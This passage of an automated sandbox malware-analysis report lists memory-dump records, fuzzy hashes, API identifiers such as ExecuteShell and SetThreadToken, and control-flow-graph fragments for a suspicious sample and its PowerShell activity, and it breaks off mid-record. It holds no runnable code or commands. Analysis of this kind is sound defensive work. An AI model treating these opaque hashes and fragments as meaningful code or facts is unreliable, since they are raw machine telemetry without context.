                                                  • Associated: 00000004.00000002.2127119958.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000004.00000002.2127469455.0000000000402000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000004.00000002.2127469455.0000000000E02000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000004.00000002.2142731863.0000000000E73000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_kx new.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled__getmainargs__set_app_type_controlfpexitmemset
                                                  • String ID:
                                                  • API String ID: 3649950142-0
                                                  • Opcode ID: 52dce7b4c269adca2e135b0b260f3394da02cf0dcd0238186c5a4fef22fa7b26
                                                  • Instruction ID: 276d267c830fb1744484ad8078350a7426bd4a7cdf1eb4e40a6b3a9487509305
                                                  • Opcode Fuzzy Hash: 52dce7b4c269adca2e135b0b260f3394da02cf0dcd0238186c5a4fef22fa7b26
                                                  • Instruction Fuzzy Hash: 2B11ECF5A00204AFCB00EBA9DC55F4A73ECE748304F144475F909F7361E579E9888B65

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2127266229.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.2127119958.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000004.00000002.2127469455.0000000000402000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000004.00000002.2127469455.0000000000E02000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000004.00000002.2142731863.0000000000E73000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_kx new.jbxd
                                                  Similarity
                                                  • API ID: ExecuteShellmemset$fclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
                                                  • String ID: ! @$%s\%s$& @$1 @$`!@$e!@$t!@
                                                  • API String ID: 3236948872-2690058073
                                                  • Opcode ID: f45ba74685a2dc3ad5a1e5aaf52b6cc29edc716cfb621912138e64ca51a8567c
                                                  • Instruction ID: 915970d7f8feda4f52418ac8c3b3d67a18a16e2b2df1165333ea2636041f6ec6
                                                  • Opcode Fuzzy Hash: f45ba74685a2dc3ad5a1e5aaf52b6cc29edc716cfb621912138e64ca51a8567c
                                                  • Instruction Fuzzy Hash: 888101F1E001149BDB54DBACDC45B9E77A9EB48309F040579F109FB392E63DAE448B68

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 28 401000-40102e malloc 29 401031-401039 28->29 30 401087-40108b 29->30 31 40103f-401085 29->31 31->29
                                                  APIs
                                                  Strings
                                                  • />pj)w^wi!p&370^jskbtm-=lzrjeh2*, xrefs: 0040106E
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2127266229.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.2127119958.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000004.00000002.2127469455.0000000000402000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000004.00000002.2127469455.0000000000E02000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000004.00000002.2142731863.0000000000E73000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_kx new.jbxd
                                                  Similarity
                                                  • API ID: malloc
                                                  • String ID: />pj)w^wi!p&370^jskbtm-=lzrjeh2*
                                                  • API String ID: 2803490479-4076278676
                                                  • Opcode ID: 6b0f6023af0dde842a795475da203acb5dc2305be251553dc905807124ae4844
                                                  • Instruction ID: 73f043a98e2a7ee5c63033fe1d48318bea4b72fbf4f694dacf033b8f0cb0a464
                                                  • Opcode Fuzzy Hash: 6b0f6023af0dde842a795475da203acb5dc2305be251553dc905807124ae4844
                                                  • Instruction Fuzzy Hash: FA11CCB0E05648EFCB08CFACD5907ADBBF1AF49304F1480AAE856E7391D635AE41DB45

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 34 40145b-4014ae call 4013b4 call 40108c call 401410
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2127266229.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.2127119958.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000004.00000002.2127469455.0000000000402000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000004.00000002.2127469455.0000000000E02000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000004.00000002.2142731863.0000000000E73000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_kx new.jbxd
                                                  Similarity
                                                  • API ID: memset$ExecuteShellstrcmp
                                                  • String ID: D`:vD`:v$D`:vD`:v
                                                  • API String ID: 1389483452-3916433284
                                                  • Opcode ID: 922b65df33b6ed7bcce59c6e1f11fdccde716ae67d3a0a1bab3ccac911db9833
                                                  • Instruction ID: 76c1b6daecc4063cf20948b66e9e7b3ce613b504874fb2aeec9fcfb98b4de26b
                                                  • Opcode Fuzzy Hash: 922b65df33b6ed7bcce59c6e1f11fdccde716ae67d3a0a1bab3ccac911db9833
                                                  • Instruction Fuzzy Hash: 9AF09E75A00208AFCB40EFADD981D8A77F8AB4C304F1044A5FD48E7351D674E9848B55
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2153401935.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_eb0000_SolaraBootstrapper.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 89388ad4c6119bb39c17e439fc53f66e311b313e22c7dd48e4695086f08c9f1c
                                                  • Instruction ID: 21ea11dc6b63e047850e184fa97d61185330e8d74f98d17f6d71610d76b8d294
                                                  • Opcode Fuzzy Hash: 89388ad4c6119bb39c17e439fc53f66e311b313e22c7dd48e4695086f08c9f1c
                                                  • Instruction Fuzzy Hash: 63F12575D01229CFDB28EF65D984BEEBBB2BB89300F1095A9C409B7254DB306E85CF14
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2153401935.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_eb0000_SolaraBootstrapper.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 08a3ef78d3f2c274458cd388af1a6c3eb805e241f39893716a9e5171d8340e73
                                                  • Instruction ID: 84d9ad1db41b368456fdb0d6042e7786fe65e1e11e6a81386947ec45e9aafbc2
                                                  • Opcode Fuzzy Hash: 08a3ef78d3f2c274458cd388af1a6c3eb805e241f39893716a9e5171d8340e73
                                                  • Instruction Fuzzy Hash: C7E11675D00229CFDB28EF65D988BDEBBB2BB89300F1095A9C419B7264DB345E85CF14
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2153401935.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_eb0000_SolaraBootstrapper.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @]
                                                  • API String ID: 0-3548746480
                                                  • Opcode ID: 13dd26b4be78078f16a9c5998db1aa7409cac1fbe948569498a12c86b2031dcd
                                                  • Instruction ID: 34be9e9ad3afb9c70c5b6530922c5277888917d9d5cc54937abcd6602390e6b9
                                                  • Opcode Fuzzy Hash: 13dd26b4be78078f16a9c5998db1aa7409cac1fbe948569498a12c86b2031dcd
                                                  • Instruction Fuzzy Hash: 37E08671641208DFC701EFB5F905A9FB7B8EB41385F905568D404B72A0DB715E08D751
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2153401935.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_eb0000_SolaraBootstrapper.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fadaf0d48661a7f0445833d9e7767c4a735da3efbb9aaf2feb13d10b86447e48
                                                  • Instruction ID: 17e2c58354f558e6d75d09a4ff15d7f7b441b3b6a9dacf3f7043af844303003e
                                                  • Opcode Fuzzy Hash: fadaf0d48661a7f0445833d9e7767c4a735da3efbb9aaf2feb13d10b86447e48
                                                  • Instruction Fuzzy Hash: CF017874D092849FCB12DFB4E4504ADBFB0AF4A300B2484EEC851A7262D7350909CF50
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2153401935.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_eb0000_SolaraBootstrapper.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bd7c59b3d985483d33ab4a41b3bfb7e13abaeca11a40a9195dbf990c4bc0f0af
                                                  • Instruction ID: 594b76c98d8278200eb4ec957d13292392fdc9370caa5121bf29dbc71503c557
                                                  • Opcode Fuzzy Hash: bd7c59b3d985483d33ab4a41b3bfb7e13abaeca11a40a9195dbf990c4bc0f0af
                                                  • Instruction Fuzzy Hash: B9C11575D00229CFCB28EF60D998BEEBBB1BB89301F1095A9C459B7254DB346E85CF14
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2153401935.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_eb0000_SolaraBootstrapper.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1ef0f97b34295f6551e69aca67b95073b5cce8067d781644bc268c1ddd5ee0ac
                                                  • Instruction ID: 26cbaee1fa38cf9da43e28d29ea5906570a76b5c6832f7273ab07030ba5fc458
                                                  • Opcode Fuzzy Hash: 1ef0f97b34295f6551e69aca67b95073b5cce8067d781644bc268c1ddd5ee0ac
                                                  • Instruction Fuzzy Hash: 35C11775D00229CFCB24EF60D998BEEBBB1BB49301F1095A9C45AB7254DB345E85CF14
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2153401935.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_eb0000_SolaraBootstrapper.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e4145f5b4bdd4e6b0105c301f538f0fd669798245e8b95e229a0c48b2b71ab24
                                                  • Instruction ID: 13611834c21f6ea6c1ee2260bc82be71c0c4c6e46444143b70b66258052d07f1
                                                  • Opcode Fuzzy Hash: e4145f5b4bdd4e6b0105c301f538f0fd669798245e8b95e229a0c48b2b71ab24
                                                  • Instruction Fuzzy Hash: 7F512C70D012298FCB65EF74D9547EEBBB1BB4A300F106899C50AB32A4DB309E95CF54
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2153401935.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_eb0000_SolaraBootstrapper.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b80a68cfad18bd5039ed94ea9a0e4cf0f4942b22fc96a8fcdbabed5ef9a03606
                                                  • Instruction ID: 475e9f2fbe39901c93c69702717ac452ef290848077868d02bc84dec8d6da6b6
                                                  • Opcode Fuzzy Hash: b80a68cfad18bd5039ed94ea9a0e4cf0f4942b22fc96a8fcdbabed5ef9a03606
                                                  • Instruction Fuzzy Hash: 3C412C74D012298FCB65EF74D854BEEBBB1BB4A300F1064A9D50AB3264DB309E95CF54
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2153401935.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_eb0000_SolaraBootstrapper.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 32cd128e6d63ce27cd97051bea613fdfa18fc7f596f2c0714cd8c48e2a2b4995
                                                  • Instruction ID: 1534972f797a2520d4e585a0e7bc30534052bfe13fd69f95a4689422cf5370d7
                                                  • Opcode Fuzzy Hash: 32cd128e6d63ce27cd97051bea613fdfa18fc7f596f2c0714cd8c48e2a2b4995
                                                  • Instruction Fuzzy Hash: F1410674E01208DFDB69DFA9D890ADEBBB2BF89310F509429E414B7364DB306846CF50
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2153401935.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_eb0000_SolaraBootstrapper.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 819d0bd0201b59c0521db3669a6bb067f1a88d323cdafc4aa29002324b581208
                                                  • Instruction ID: 41c1e7dda4e7a6356b167745a476afed9f054ca9b574bcc849bed1dd5349deb3
                                                  • Opcode Fuzzy Hash: 819d0bd0201b59c0521db3669a6bb067f1a88d323cdafc4aa29002324b581208
                                                  • Instruction Fuzzy Hash: 7021F475D01208DFCB18DFA5D554ADEBBF2AF89300F20A429E501B73A0CB315D44CBA4
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2153401935.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_eb0000_SolaraBootstrapper.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 85213d62f2cfc2e92dbf24f29d90c61f2347bc53cfda0c16ce101403f3402ad1
                                                  • Instruction ID: e42f009d94ecf550fb75d1daf070b12622837fc276470de94c76fc34ee3bf3a9
                                                  • Opcode Fuzzy Hash: 85213d62f2cfc2e92dbf24f29d90c61f2347bc53cfda0c16ce101403f3402ad1
                                                  • Instruction Fuzzy Hash: 5CF0B774E001188FCB54DF68D890A9DB7B0FF88310F1090AAD518E3320DB309940DF00

                                                  Execution Graph

                                                  Execution Coverage:6.3%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:3
                                                  Total number of Limit Nodes:0
                                                  execution_graph 21373 8fc6848 21374 8fc688b SetThreadToken 21373->21374 21375 8fc68b9 21374->21375

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 858 4f9b568-4f9b591 859 4f9b593 858->859 860 4f9b596-4f9b8d1 call 4f9aa7c 858->860 859->860 921 4f9b8d6-4f9b8dd 860->921
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: de048806be412991122d229cdb50c122e17ad8626987d05d2305931e2379ac3b
                                                  • Instruction ID: dae6c464081c7b853a55cfb287bcfff8fbb8671bf180fc124d1feb0008b62b5d
                                                  • Opcode Fuzzy Hash: de048806be412991122d229cdb50c122e17ad8626987d05d2305931e2379ac3b
                                                  • Instruction Fuzzy Hash: 7291A074F407149BEB19EFB489106AE77F2EFC4600B00892ED146AB758DF38AD068BD5

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 922 4f9b578-4f9b591 923 4f9b593 922->923 924 4f9b596-4f9b8d1 call 4f9aa7c 922->924 923->924 985 4f9b8d6-4f9b8dd 924->985
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3a933292c1f34bce4b9ade24bdab09ad83c5f501258e3f7a53ac6a80b4859d91
                                                  • Instruction ID: 20eb1be3f9869872f91ebf47016fdb2477843eb5a6c1825a677b46a60054f487
                                                  • Opcode Fuzzy Hash: 3a933292c1f34bce4b9ade24bdab09ad83c5f501258e3f7a53ac6a80b4859d91
                                                  • Instruction Fuzzy Hash: 83919174F407159BEF19EFB489106AE77E2EFC4600B00892ED106AB758DF39AD068BD5

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 7e53ce8-7e53d0d 1 7e53f00-7e53f4a 0->1 2 7e53d13-7e53d18 0->2 10 7e53f50-7e53f55 1->10 11 7e540ce-7e54112 1->11 3 7e53d30-7e53d34 2->3 4 7e53d1a-7e53d20 2->4 8 7e53eb0-7e53eba 3->8 9 7e53d3a-7e53d3c 3->9 6 7e53d24-7e53d2e 4->6 7 7e53d22 4->7 6->3 7->3 12 7e53ebc-7e53ec5 8->12 13 7e53ec8-7e53ece 8->13 14 7e53d4c 9->14 15 7e53d3e-7e53d4a 9->15 16 7e53f57-7e53f5d 10->16 17 7e53f6d-7e53f71 10->17 29 7e54228-7e5424c 11->29 30 7e54118-7e5411d 11->30 18 7e53ed4-7e53ee0 13->18 19 7e53ed0-7e53ed2 13->19 21 7e53d4e-7e53d50 14->21 15->21 22 7e53f61-7e53f6b 16->22 23 7e53f5f 16->23 26 7e53f77-7e53f79 17->26 27 7e54080-7e5408a 17->27 25 7e53ee2-7e53efd 18->25 19->25 21->8 28 7e53d56-7e53d75 21->28 22->17 23->17 32 7e53f89 26->32 33 7e53f7b-7e53f87 26->33 34 7e54097-7e5409d 27->34 35 7e5408c-7e54094 27->35 63 7e53d85 28->63 64 7e53d77-7e53d83 28->64 51 7e541db-7e541e4 29->51 57 7e5424e-7e5425d 29->57 42 7e54135-7e54139 30->42 43 7e5411f-7e54125 30->43 38 7e53f8b-7e53f8d 32->38 33->38 39 7e540a3-7e540af 34->39 40 7e5409f-7e540a1 34->40 38->27 49 7e53f93-7e53fb2 38->49 50 7e540b1-7e540cb 39->50 40->50 46 7e5413f-7e54141 42->46 47 7e541da 42->47 44 7e54127 43->44 45 7e54129-7e54133 43->45 44->42 45->42 55 7e54151 46->55 56 7e54143-7e5414f 46->56 47->51 83 7e53fb4-7e53fc0 49->83 84 7e53fc2 49->84 60 7e541e6-7e541ee 51->60 61 7e541f1-7e541f7 51->61 65 7e54153-7e54155 55->65 56->65 58 7e5425f-7e54281 57->58 59 7e5428b-7e54295 57->59 105 7e542d5-7e542fe 58->105 106 7e54283-7e54288 58->106 72 7e54297-7e5429c 59->72 73 7e5429f-7e542a5 59->73 68 7e541fd-7e54209 61->68 69 7e541f9-7e541fb 61->69 70 7e53d87-7e53d89 63->70 64->70 65->47 71 7e5415b-7e5415d 65->71 75 7e5420b-7e54225 68->75 69->75 70->8 76 7e53d8f-7e53d96 70->76 77 7e54177-7e5417e 71->77 78 7e5415f-7e54165 71->78 80 7e542a7-7e542a9 73->80 81 7e542ab-7e542b7 73->81 76->1 86 7e53d9c-7e53da1 76->86 89 7e54196-7e541d7 77->89 90 7e54180-7e54186 77->90 87 7e54167 78->87 88 7e54169-7e54175 78->88 91 7e542b9-7e542d2 80->91 81->91 92 7e53fc4-7e53fc6 83->92 84->92 93 7e53da3-7e53da9 86->93 94 7e53db9-7e53dc8 86->94 87->77 88->77 96 7e54188 90->96 97 7e5418a-7e54194 90->97 92->27 101 7e53fcc-7e54003 92->101 103 7e53dad-7e53db7 93->103 104 7e53dab 93->104 94->8 111 7e53dce-7e53dec 94->111 96->89 97->89 125 7e54005-7e5400b 101->125 126 7e5401d-7e54024 101->126 103->94 104->94 119 7e54300-7e54326 105->119 120 7e5432d-7e5435c 105->120 111->8 123 7e53df2-7e53e17 111->123 119->120 128 7e54395-7e5439f 120->128 129 7e5435e-7e5437b 120->129 123->8 150 7e53e1d-7e53e24 123->150 132 7e5400d 125->132 133 7e5400f-7e5401b 125->133 130 7e54026-7e5402c 126->130 131 7e5403c-7e5407d 126->131 137 7e543a1-7e543a5 128->137 138 7e543a8-7e543ae 128->138 145 7e543e5-7e543ea 129->145 146 7e5437d-7e5438f 129->146 134 7e54030-7e5403a 130->134 135 7e5402e 130->135 132->126 133->126 134->131 135->131 143 7e543b4-7e543c0 138->143 144 7e543b0-7e543b2 138->144 149 7e543c2-7e543e2 143->149 144->149 145->146 146->128 153 7e53e26-7e53e41 150->153 154 7e53e6a-7e53e9d 150->154 159 7e53e43-7e53e49 153->159 160 7e53e5b-7e53e5f 153->160 166 7e53ea4-7e53ead 154->166 162 7e53e4d-7e53e59 159->162 163 7e53e4b 159->163 164 7e53e66-7e53e68 160->164 162->160 163->160 164->166
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2165886534.0000000007E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_7e50000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'jq$4'jq$4'jq$4'jq
                                                  • API String ID: 0-4000621977
                                                  • Opcode ID: 624918234d8d0c181c3630a670ae125ec077a6790d8d252b24f29012ea9cf6d4
                                                  • Instruction ID: da21a9795e4a1332568f0e9a43e4e54a5d7402bdaec503657aaa8f74a2211da0
                                                  • Opcode Fuzzy Hash: 624918234d8d0c181c3630a670ae125ec077a6790d8d252b24f29012ea9cf6d4
                                                  • Instruction Fuzzy Hash: CF126AB17053598FCB119B68C4107AABBA2AFD6318F1484BBDD05CF291DB31CD81CBA2

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 171 8fc67f7-8fc6883 172 8fc688b-8fc68b7 SetThreadToken 171->172 173 8fc68b9-8fc68bf 172->173 174 8fc68c0-8fc68dd 172->174 173->174
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2172340308.0000000008FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_8fc0000_powershell.jbxd
                                                  Similarity
                                                  • API ID: ThreadToken
                                                  • String ID:
                                                  • API String ID: 3254676861-0
                                                  • Opcode ID: bde14c42cc96e0be8f70ed6cb3cce99f1f799785d5e62aacbe78a1c3e5b604d5
                                                  • Instruction ID: 857a2482ccaefef688da67b132eb37b743af585f1303c041bd0c67550b920db9
                                                  • Opcode Fuzzy Hash: bde14c42cc96e0be8f70ed6cb3cce99f1f799785d5e62aacbe78a1c3e5b604d5
                                                  • Instruction Fuzzy Hash: A6217A748053848FDB11CFAAC484A9ABFF0EF59250F14449EC099A7252C678A805CFA6

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 177 8fc6848-8fc68b7 SetThreadToken 179 8fc68b9-8fc68bf 177->179 180 8fc68c0-8fc68dd 177->180 179->180
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2172340308.0000000008FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_8fc0000_powershell.jbxd
                                                  Similarity
                                                  • API ID: ThreadToken
                                                  • String ID:
                                                  • API String ID: 3254676861-0
                                                  • Opcode ID: c2bc78a20572a9a7c8bba3f84446e3f0ea83e602c57ffe516f46fa88bf57ad6f
                                                  • Instruction ID: 335f1fef065514540e8759502c1a2eabea164ab9dc962e552a88d766de5796cc
                                                  • Opcode Fuzzy Hash: c2bc78a20572a9a7c8bba3f84446e3f0ea83e602c57ffe516f46fa88bf57ad6f
                                                  • Instruction Fuzzy Hash: B91125B19002098FDB10DF9AC944B9EFBF8EF88320F248419D418A3250D778A944CFA5

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 183 4f9e890-4f9e8bd 184 4f9e8bf-4f9e936 183->184 185 4f9e865-4f9e88a 183->185 195 4f9e9ba-4f9e9d3 184->195 196 4f9e93c-4f9e953 184->196 199 4f9e9de 195->199 200 4f9e9d5 195->200 202 4f9e95b-4f9e9b8 196->202 201 4f9e9df 199->201 200->199 201->201 202->195 202->196
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: J?l
                                                  • API String ID: 0-1250430511
                                                  • Opcode ID: b5d9f714dc1e1a05322241277e45dd24038692961fbd2ecdfe536436c3c72dce
                                                  • Instruction ID: 063ff1fb26543d84eec8bedec2f43debae4225e7fde25dc306cebd9500fe62b7
                                                  • Opcode Fuzzy Hash: b5d9f714dc1e1a05322241277e45dd24038692961fbd2ecdfe536436c3c72dce
                                                  • Instruction Fuzzy Hash: F741CD30A042498FCB15DF68D544A9EBFF2FF49204F1486ADD005AB3A9DB31AC46CB90

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 210 4f970a8-4f970c7 211 4f971cd-4f9720b 210->211 212 4f970cd-4f970d0 210->212 240 4f970d2 call 4f9775f 212->240 241 4f970d2 call 4f97744 212->241 213 4f970d8-4f970ea 215 4f970ec 213->215 216 4f970f6-4f9710b 213->216 215->216 222 4f97111-4f97121 216->222 223 4f97196-4f971af 216->223 224 4f9712d-4f97138 222->224 225 4f97123 222->225 228 4f971ba 223->228 229 4f971b1 223->229 238 4f9713b call 4f9c008 224->238 239 4f9713b call 4f9bff8 224->239 225->224 228->211 229->228 231 4f97141-4f97145 232 4f97185-4f97190 231->232 233 4f97147-4f97157 231->233 232->222 232->223 234 4f97159-4f97171 233->234 235 4f97173-4f9717d 233->235 234->232 235->232 238->231 239->231 240->213 241->213
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (nq
                                                  • API String ID: 0-2756854522
                                                  • Opcode ID: 916d473f36584bcf2babaf0968090655ba2c89735351ffcfa47d890b33991a3b
                                                  • Instruction ID: 67fd718f19a10a5519fc4f746ecedfd665ebcb545490192ed0bc7f11e98a5fa2
                                                  • Opcode Fuzzy Hash: 916d473f36584bcf2babaf0968090655ba2c89735351ffcfa47d890b33991a3b
                                                  • Instruction Fuzzy Hash: 5A412934B14204CFDB189F68C458AAABBF2EF8D715F1444A9D806AB395DB35EC42CB61

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 242 4f9e8c0-4f9e936 249 4f9e9ba-4f9e9d3 242->249 250 4f9e93c-4f9e953 242->250 253 4f9e9de 249->253 254 4f9e9d5 249->254 256 4f9e95b-4f9e9b8 250->256 255 4f9e9df 253->255 254->253 255->255 256->249 256->250
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: J?l
                                                  • API String ID: 0-1250430511
                                                  • Opcode ID: 5bcf67458c11f4581a9be3f210de47749d26f7b2bdf6e75307c3e1630513c100
                                                  • Instruction ID: a644eced87fc98f3d8578d290852e55c973d2c31b3e682e42097fa72b74166a9
                                                  • Opcode Fuzzy Hash: 5bcf67458c11f4581a9be3f210de47749d26f7b2bdf6e75307c3e1630513c100
                                                  • Instruction Fuzzy Hash: D7319C34A002058FCB14DF69D594A9EBBF6FF48304F108568D406A7398DB34AC46CFA0

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 264 4f9b080-4f9b089 call 4f9a780 266 4f9b08e-4f9b092 264->266 267 4f9b0a2-4f9b13d 266->267 268 4f9b094-4f9b0a1 266->268 274 4f9b13f-4f9b145 267->274 275 4f9b146-4f9b163 267->275 274->275
                                                  Strings
                                                  Memory Dump Source
